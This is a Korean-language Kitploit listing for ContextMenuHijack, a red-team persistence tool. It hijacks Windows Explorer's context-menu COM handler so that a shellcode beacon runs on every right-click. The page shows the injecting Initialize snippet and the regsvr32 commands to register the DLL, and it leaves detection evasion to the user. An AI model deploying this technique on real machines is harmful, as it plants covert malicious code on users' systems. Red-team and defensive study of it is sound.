Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ContextMenuHijack — 탐색기 메뉴에서 파일/폴더를 우클릭할 때마다 페이로드를 실행하여 지속성을 유지합니다. | Kitploit
도구/GitHubGitHub/ristbs/contextmenuhijack
Persistence MechanismsPost-ExploitationRed TeamingPayload Development
GitHubristbs/contextmenuhijack

ContextMenuHijack

탐색기 메뉴에서 파일/폴더를 우클릭할 때마다 페이로드를 실행하여 지속성을 유지합니다.

저장소 보기
173273년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ContextMenuHijack

저에게 영감을 준 이 독창적인 아이디어는 @NinjaParanoid의 것입니다:

Video

ContextMenuHijack은 사용자 행동에 기반한 COM 하이재킹을 사용하는 간단한 지속성(persistence) 기술입니다. 파일 탐색기에서 파일/폴더를 마우스 오른쪽 버튼으로 클릭하여 상황에 맞는 메뉴(Context Menu)를 열면, 동시에 우리가 지정한 비콘(beacon)이 실행됩니다.

root@kitploit:~
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
    DWORD tid = NULL;
    CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);

    if (NULL == pDataObj) {
	if (pidlFolder != NULL) {
	}
        return S_OK;
    }
    return S_OK;
}

사용법

솔루션 파일(.sln)을 로드하여 빌드하기만 하면 됩니다. 이 지속성 기술을 사용하려면 관리자 권한이 필요하다는 점을 아는 것이 중요합니다. 모든 작업을 마친 후에는 regsvr32로 레지스트리에 DLL 파일을 등록하기만 하면 됩니다:

root@kitploit:~
regsvr32 "C:\path\to\ContextMenuHijack.dll"

제거하려면 /u 플래그를 사용하면 됩니다

root@kitploit:~
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"

persistence1

  • 이 기술은 explorer.exe의 스레드 스택에서 쉽게 탐지될 수 있습니다. 자체 회피 기법을 사용하는 것은 여러분의 몫입니다 image

크레딧

  • https://github.com/rikka0w0/ExplorerContextMenuTweaker
  • https://learn.microsoft.com/en-us/windows/win32/shell/how-to-implement-the-icontextmenu-interface?redirectedfrom=MSDN
  • https://www.codeproject.com/Articles/441/The-Complete-Idiot-s-Guide-to-Writing-Shell-Extens
도구 다운로드